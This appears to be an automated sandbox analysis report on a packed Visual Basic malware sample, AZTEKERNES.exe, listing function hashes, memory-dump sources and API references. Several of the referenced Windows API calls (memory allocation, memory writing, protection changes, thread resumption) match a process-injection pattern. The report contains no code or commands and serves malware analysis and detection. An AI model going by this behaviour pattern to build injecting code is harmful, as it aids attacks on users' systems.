Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mpam-77b29277.exe PID: 6444 Parent PID: 3224

General

Start time:	04:46:03
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Imagebase:	0x7ff6a36d0000
File size:	7855240 bytes
MD5 hash:	34B7B3BDFA61E18D3B2C3B0AC92B78EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpSigStub.exe PID: 4520 Parent PID: 6444

General

Start time:	04:46:08
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Imagebase:	0x7ff7b57c0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: AZTEKERNES.exe PID: 3516 Parent PID: 1848 AZTEKERNES.exeCOMMON

Executed Functions

Function 022FAB15, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 906b87a58f25e4a2a21931f40aca6f9a28cfac650c271dcc26beeef51a686d6d
Instruction ID: 73123ceafe69078cdfde1382f28447c28931b7ac2c74947cc67e7b1c207be1a7
Opcode Fuzzy Hash: 906b87a58f25e4a2a21931f40aca6f9a28cfac650c271dcc26beeef51a686d6d
Instruction Fuzzy Hash: 53B1F271614389CFCBB5EEA4C9987EAB7B2BF89310F51812ADD0D9B218D7708A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 004013E8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004013ED

Strings

VB5!6&*, xrefs: 004013E8

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4761b945ad0596f4d8c02abdee4c789572154a55d8f7ad373e2c0efa9c8ea84c
Instruction ID: a51a24be99b9b1e4edfe5f7bbc3ba33960ae3c88096309706299339b596f3dfb
Opcode Fuzzy Hash: 4761b945ad0596f4d8c02abdee4c789572154a55d8f7ad373e2c0efa9c8ea84c
Instruction Fuzzy Hash: 3C919A6504E3D19FD3039B708CA55A27FB4EE1321471E06DBD8C2CF5A3E22C596AD762

Uniqueness

Uniqueness Score: -1.00%

Function 022F2293, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

Lo, xrefs: 022F225E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: Lo
API String ID: 2167126740-1710286940
Opcode ID: 0a1e388ee63224cd3b5872e832a02558bc2643f04eafb8824c46af717f5aa8a6
Instruction ID: 93157d32970ebd0261f5a2d0171afaf2e992a03b0b307381a6d7bc23ed6b6a21
Opcode Fuzzy Hash: 0a1e388ee63224cd3b5872e832a02558bc2643f04eafb8824c46af717f5aa8a6
Instruction Fuzzy Hash: 3D7166316293C4CFD7568FB48C156C9FFA2EF43600F0906EADA858F66AD720450ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 022FAB42, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 63f1a6cbc75b905c4f3682b0490f0ae79f9157a26088b4c48f2529d7d4a7e040
Instruction ID: 5ccc905c211e368d21d3664400a5f437642d06c50a41591ff9f3465da1db9fee
Opcode Fuzzy Hash: 63f1a6cbc75b905c4f3682b0490f0ae79f9157a26088b4c48f2529d7d4a7e040
Instruction Fuzzy Hash: 15810471914385CFDB79EE64C8987EAB7B2FF89310F55812ACD0A9F218D7309A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FAB9E, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: ecbd5a8db99fe1e3b71de2e6d0491f4700a93451ccd73cf4f454971de6e4e461
Instruction ID: 1e97077d17176932b5b35298e5d6f49be5e7cc2871f109f7224c0896c8a8ff16
Opcode Fuzzy Hash: ecbd5a8db99fe1e3b71de2e6d0491f4700a93451ccd73cf4f454971de6e4e461
Instruction Fuzzy Hash: B9810571514345CFCB79EE64C9987EA77B2BF89310F55812ACD0E9B218D7308A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FAC0B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 1768e25058cdb504c8a593b955c9d3933bd42ce9ff802d3f89206a03580c9e2d
Instruction ID: 38ea2e8ee140b890be9290412677130153af8c6e3b50c99e04b62d28724c57af
Opcode Fuzzy Hash: 1768e25058cdb504c8a593b955c9d3933bd42ce9ff802d3f89206a03580c9e2d
Instruction Fuzzy Hash: 0A71DF31A14385CFDB79DE64C9587EABBB2FF89310F55816ACD0A9F218D7309A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FAC41, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 37ac5d0f04dcce938c02fab1d83451c0e5149fdc85a6ce04ff723745d01469a8
Instruction ID: 9a66b7d5f4452fa8fc308fdcd391abef2a3a96a089e4450c03cbaf470a85514e
Opcode Fuzzy Hash: 37ac5d0f04dcce938c02fab1d83451c0e5149fdc85a6ce04ff723745d01469a8
Instruction Fuzzy Hash: 6D71F031A14385CFDB79EE74C9587EABBB2FF89310F55816ACD099B218D7309A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FAC92, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 7d8c576262b2c1503edfb7f64fc62d55763f6863aeeddde3b5b1feb18b738080
Instruction ID: f367bb82e22bb1d1cf6b49833bb246c510f22d9a6bba5f90fac647580493f6bb
Opcode Fuzzy Hash: 7d8c576262b2c1503edfb7f64fc62d55763f6863aeeddde3b5b1feb18b738080
Instruction Fuzzy Hash: E371ED31A14385CFDB799E68C9887DABBB2BF85310F46816ACD099B219D7309A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FAC72, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 3d618ef442ddc3da55aa9f91b53711da9a53f8eb7d4b1cf676363867fd07cc77
Instruction ID: 800cf0ddaa7b797aa83356d9cbd5b29f248ce67e549a9013a7609720a9fb2aa6
Opcode Fuzzy Hash: 3d618ef442ddc3da55aa9f91b53711da9a53f8eb7d4b1cf676363867fd07cc77
Instruction Fuzzy Hash: 55610F31A14385CFCB79DE64C9987EABBB2BF89310F55812ACD099F218D7309A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FACC6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: 1b41d36118fe06b327d4f9d19961d6580c32f052a91c95b0b794dea50291c48e
Instruction ID: 69449a5265d797abbc47df0846f61136793a5143ae41032b90d2b5e12aace7b1
Opcode Fuzzy Hash: 1b41d36118fe06b327d4f9d19961d6580c32f052a91c95b0b794dea50291c48e
Instruction Fuzzy Hash: 2071FE31A14385CFCB799E74C8487DABBB2BF86310F55816ECD099F219D7309A45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022FAD8E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

73g, xrefs: 022FAE5E

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 73g
API String ID: 0-972357897
Opcode ID: cca999f0cf7490893245bd57ae97f7295d7a322cfd4e3a1a8af8aba4100ac09a
Instruction ID: dba6acdb34c1ec3fe589baaaf6df6d2a1d61c8f03f3c412c380208dcc4f696c9
Opcode Fuzzy Hash: cca999f0cf7490893245bd57ae97f7295d7a322cfd4e3a1a8af8aba4100ac09a
Instruction Fuzzy Hash: A8510032914285CFCB79DF74C8893DABBB1FF89310F56816ACD099B219D3309A45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022F91AF, Relevance: 3.2, APIs: 2, Instructions: 192memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 022F89E2: LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

NtAllocateVirtualMemory.NTDLL ref: 022F9372

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 0282d93bd07d5815c1c23e9bab30858ea64a04224040fa903b7d9063232cfb0a
Instruction ID: 4c76b41fbc775ae4a8fefef5328529f0d36e35afca555c78ddf4f4329ddca1a1
Opcode Fuzzy Hash: 0282d93bd07d5815c1c23e9bab30858ea64a04224040fa903b7d9063232cfb0a
Instruction Fuzzy Hash: 367103702143498FCFB0DF69CC957DABBA6EF49750F81412AED4DEB218D3708A858B12

Uniqueness

Uniqueness Score: -1.00%

Function 022F5D74, Relevance: 1.8, APIs: 1, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4defdc8c4158d2b46e6208db651201d61a1e670e94ea4ac89ece38736c1793
Instruction ID: 049209f3e2f9264a473ff8b5672903ec501e895dc129f52f516c7d9b26c9bf86
Opcode Fuzzy Hash: 8a4defdc8c4158d2b46e6208db651201d61a1e670e94ea4ac89ece38736c1793
Instruction Fuzzy Hash: E0B112725193C9AFCB26CF748C896D9BFB1FF16304F5804AED9988B616D3319A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 022F5DC7, Relevance: 1.7, APIs: 1, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06037bf580966df2a6749a1904bc43f6efeabb448b85e77d77041af8ad7e2de3
Instruction ID: a89eb11eee8e52e5158cf174e255a292bfba162cf3accda91566fa45ba2b5153
Opcode Fuzzy Hash: 06037bf580966df2a6749a1904bc43f6efeabb448b85e77d77041af8ad7e2de3
Instruction Fuzzy Hash: 608102B25193C99BC736CF388C897DABFB0EF15314F54046ED9898B606D3704A46CB00

Uniqueness

Uniqueness Score: -1.00%

Function 022F5E52, Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81142d8f8ea8de27df248a7d5eabf5e4a5c0c8074d54cd186942317fa1b6b6cf
Instruction ID: 6601d6cd79a826981f59220ba4948903579eea723d6fd0ccaf220b947765876b
Opcode Fuzzy Hash: 81142d8f8ea8de27df248a7d5eabf5e4a5c0c8074d54cd186942317fa1b6b6cf
Instruction Fuzzy Hash: 7461E0B2A193899BDB36CF38CC897DABBA5FB19310F54046ED9488F60AD3705A45CB00

Uniqueness

Uniqueness Score: -1.00%

Function 022F91F6, Relevance: 1.6, APIs: 1, Instructions: 116memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 022F89E2: LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

NtAllocateVirtualMemory.NTDLL ref: 022F9372

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 6d21e7ae381e339c6839827dbf7436789171e06a0373cc05e6844537f4e4e723
Instruction ID: dc4202369a0db0c48edd2fffe395fadaf9bd2dbe539c0b4e48b54174428fa229
Opcode Fuzzy Hash: 6d21e7ae381e339c6839827dbf7436789171e06a0373cc05e6844537f4e4e723
Instruction Fuzzy Hash: FD412371514248CFCB718F65DC457EABBE2EF89354F454129ED48AF228D3315985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022F5F89, Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,-D9BB8846), ref: 022F60CE

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 66d8392f72837f5c6990843c71131805fbfafe6cd00376788d628898c20d8958
Instruction ID: 496a4241a8bbcbfde3ac166f891b884d9581f47756f4638f7ba0fc7a2d0edbfd
Opcode Fuzzy Hash: 66d8392f72837f5c6990843c71131805fbfafe6cd00376788d628898c20d8958
Instruction Fuzzy Hash: 5A41EE7160A3C9AFDB26CF38C8957D5BFB0FF46304F59009AD9988F61AE2309646CB40

Uniqueness

Uniqueness Score: -1.00%

Function 022F9043, Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7edfe516ffae3cd9e5841003e4d4fd459556910d318c8ef13e224f7f7bc6bdff
Instruction ID: a1ecebe149d89706ce0f87e9f5a8709e407984a4416ebda2d823ff25f72de5d5
Opcode Fuzzy Hash: 7edfe516ffae3cd9e5841003e4d4fd459556910d318c8ef13e224f7f7bc6bdff
Instruction Fuzzy Hash: 513126702183499FDFB49FB4CCE57DAB6A2AF45740F81813EDE4DDB618C73486858A12

Uniqueness

Uniqueness Score: -1.00%

Function 022F92BD, Relevance: 1.6, APIs: 1, Instructions: 77librarymemorynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03
NtAllocateVirtualMemory.NTDLL ref: 022F9372

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 7b01a24ebdda96fd07404356f879e334142da66ff3b36f505905f4f5018dbdfe
Instruction ID: 02253c5759a5d91fe3f31a24ae3c7e97433ae5c7702d3761e21e1018e61eb9eb
Opcode Fuzzy Hash: 7b01a24ebdda96fd07404356f879e334142da66ff3b36f505905f4f5018dbdfe
Instruction Fuzzy Hash: A131D531419288CFCB715F24DC557DABBB6EF4A314F490169ED8CAF264D7715A80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 022F81AA, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99dd45038f8c1dbd578e84a4b95d9a944b30088696191d930e87e4004bac5d26
Instruction ID: 09d33baf0e9efc1acf83016ed20bebe1162a718157592c4a30083dc4615194a3
Opcode Fuzzy Hash: 99dd45038f8c1dbd578e84a4b95d9a944b30088696191d930e87e4004bac5d26
Instruction Fuzzy Hash: 0431D731A3D280CFE7989F70D8066AAFBA0FF52341F45085ED5879B129E7705580CB47

Uniqueness

Uniqueness Score: -1.00%

Function 022FAEC6, Relevance: 1.6, APIs: 1, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 022FAFE4

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0e6f850dcf9b3f7576204c8a6964f59f8276aa4bf074eee633d261e8a4fde3c4
Instruction ID: 84427dabd09b574bf83f62db8a6d3c98b982b57e76a55a236edf0c989d2dfca9
Opcode Fuzzy Hash: 0e6f850dcf9b3f7576204c8a6964f59f8276aa4bf074eee633d261e8a4fde3c4
Instruction Fuzzy Hash: 8021C132A14284CFDB69DF75C9487DABBB2BFC9300F568169C9084F618D731AA46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022F6057, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,-D9BB8846), ref: 022F60CE

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 0e34a4d872efe07d4c8876a3a3c563c7b5addb83bc31d3e58ebd1ba4da132e61
Instruction ID: dcc13fa5827c2e70dcf0922eb28e9226c4102f80bf0e0ff1cd89c08a59ae59ac
Opcode Fuzzy Hash: 0e34a4d872efe07d4c8876a3a3c563c7b5addb83bc31d3e58ebd1ba4da132e61
Instruction Fuzzy Hash: F2212F31509388AFDB2ACF3888552D5BFB0FF46314F85008AE9989F525E7715256CB40

Uniqueness

Uniqueness Score: -1.00%

Function 022F8200, Relevance: 1.6, APIs: 1, Instructions: 62fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 854a5c548851876d6d3303e2c3561fa9752beb7f2ce2a03f3d7a04d58eb97850
Instruction ID: 2e79fd3ce228b9871662d3f1033f5c05f7852370d609855c59924f5e6615c112
Opcode Fuzzy Hash: 854a5c548851876d6d3303e2c3561fa9752beb7f2ce2a03f3d7a04d58eb97850
Instruction Fuzzy Hash: 7E21F231A3D285CFEB988F70C5066AAFBA0FF52301F45045EC9879B129E7B05580CB53

Uniqueness

Uniqueness Score: -1.00%

Function 022F81DB, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 72731e658477de901dbed70ad9847fbb389bbed4ee44f86c014666b7671aff49
Instruction ID: abc95c6315f76ec106431a667773c3b3757416ad630d35c14c59897d24161405
Opcode Fuzzy Hash: 72731e658477de901dbed70ad9847fbb389bbed4ee44f86c014666b7671aff49
Instruction Fuzzy Hash: 4F218E35A3D285CFEBA89A7099156FAF6E0AF51340F45082E998786128D7B05A80CB57

Uniqueness

Uniqueness Score: -1.00%

Function 022F82EB, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,52B14C47), ref: 022F8463

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c2d363cd380bf061c83dad8b91749815e3ad4747ee694e9c6e4b90d5d5670fd3
Instruction ID: 73cacfe959122e1c44042417302549cfb156bcc61e3898f8bd254a27048e7c17
Opcode Fuzzy Hash: c2d363cd380bf061c83dad8b91749815e3ad4747ee694e9c6e4b90d5d5670fd3
Instruction Fuzzy Hash: 8A21813192A284CFD7598F31845A286BBE0FF83744F4600DED9825F129E7706545CB52

Uniqueness

Uniqueness Score: -1.00%

Function 022FA67E, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-CD536448,?,?,?,?,022F9D81,-5AD2BF69,022F51DC), ref: 022FA719

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a24fa79c446014f8b75d4e884e6cb8b9a205312c960c8316a4214cfe4d6955ac
Instruction ID: c0c4363029e2febae8ea61315474d8e67db7037fd8b63a2fcb02a8589ba01bc8
Opcode Fuzzy Hash: a24fa79c446014f8b75d4e884e6cb8b9a205312c960c8316a4214cfe4d6955ac
Instruction Fuzzy Hash: AEF031B19141949FDF34CF48CC846DEB7A9AB99300F85802A9C0DAB344DA705E40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 022FA6D2, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-CD536448,?,?,?,?,022F9D81,-5AD2BF69,022F51DC), ref: 022FA719

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9a931bef73fcf8cf5fa3cbdef90d75952bba1633425de4d132acbce9cd987d98
Instruction ID: 85ff5c856bf9ad21e4dfd1cab9de45defe58dd8e83188e8890f6e398f46f800a
Opcode Fuzzy Hash: 9a931bef73fcf8cf5fa3cbdef90d75952bba1633425de4d132acbce9cd987d98
Instruction Fuzzy Hash: 12E09A32C051A4DBCB108F35885618AFBA4FF63340B9A80EADC54BB659F7316960DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 022F0E0F, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae2467946cda5ebc31122756d7f3cfd57bff534ca3bdfc04f5325f86f35c3dc
Instruction ID: fea918daa2194a4b9f49d7553372ce6575bc748a0309279e535a74d1901725c5
Opcode Fuzzy Hash: 5ae2467946cda5ebc31122756d7f3cfd57bff534ca3bdfc04f5325f86f35c3dc
Instruction Fuzzy Hash: 5C51B836929285CBDB1A8F74DC496CABFA1EF42348F1904AEDD499F60AD731550BC780

Uniqueness

Uniqueness Score: -1.00%

Function 022F1287, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 0ed2f17fd5bd58c35ffdc38e835fc2aad1fc31b59caedb3063601bc02884e474
Instruction ID: 4ab7b2aaf62a33724c74d944b7e0b8c0c91dc945ee4f70625d04908e5d20c010
Opcode Fuzzy Hash: 0ed2f17fd5bd58c35ffdc38e835fc2aad1fc31b59caedb3063601bc02884e474
Instruction Fuzzy Hash: 6C3137729653C4CFDB71DFB588486CABFA1EF99310F4540B9C94C9F615C2B05592CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0041015B, Relevance: 109.1, APIs: 60, Strings: 2, Instructions: 606COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00410179
__vbaAryConstruct2.MSVBVM60(?,004029B8,00000003,?,?,?,?,00401236), ref: 004101A8
__vbaVarDup.MSVBVM60 ref: 004101C1
#545.MSVBVM60(?,?), ref: 004101CE
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 004101F2
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00410208
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,00401236), ref: 00410232
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 00410294
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000078), ref: 004102ED
__vbaFreeObj.MSVBVM60(00000000,?,00402950,00000078), ref: 0041030F
__vbaGenerateBoundsError.MSVBVM60 ref: 0041032D
__vbaGenerateBoundsError.MSVBVM60 ref: 00410364
__vbaGenerateBoundsError.MSVBVM60 ref: 0041039B
__vbaGenerateBoundsError.MSVBVM60 ref: 004103D2
__vbaGenerateBoundsError.MSVBVM60 ref: 00410409
__vbaGenerateBoundsError.MSVBVM60 ref: 00410440
__vbaGenerateBoundsError.MSVBVM60 ref: 00410477
__vbaGenerateBoundsError.MSVBVM60 ref: 004104AE
__vbaGenerateBoundsError.MSVBVM60 ref: 004104E5
__vbaGenerateBoundsError.MSVBVM60 ref: 0041051C
__vbaGenerateBoundsError.MSVBVM60 ref: 00410553
__vbaGenerateBoundsError.MSVBVM60 ref: 0041058A
__vbaGenerateBoundsError.MSVBVM60 ref: 004105C1
__vbaGenerateBoundsError.MSVBVM60 ref: 004105F8
__vbaGenerateBoundsError.MSVBVM60 ref: 0041062F
__vbaGenerateBoundsError.MSVBVM60 ref: 00410666
__vbaGenerateBoundsError.MSVBVM60 ref: 0041069D
__vbaGenerateBoundsError.MSVBVM60 ref: 004106D4
__vbaGenerateBoundsError.MSVBVM60 ref: 0041070B
__vbaGenerateBoundsError.MSVBVM60 ref: 00410742
__vbaGenerateBoundsError.MSVBVM60 ref: 00410779
__vbaGenerateBoundsError.MSVBVM60 ref: 004107B0
__vbaGenerateBoundsError.MSVBVM60 ref: 004107E7
__vbaGenerateBoundsError.MSVBVM60 ref: 0041081E
__vbaGenerateBoundsError.MSVBVM60 ref: 00410855
__vbaGenerateBoundsError.MSVBVM60 ref: 0041088C
__vbaGenerateBoundsError.MSVBVM60 ref: 004108C3
__vbaGenerateBoundsError.MSVBVM60 ref: 004108FA
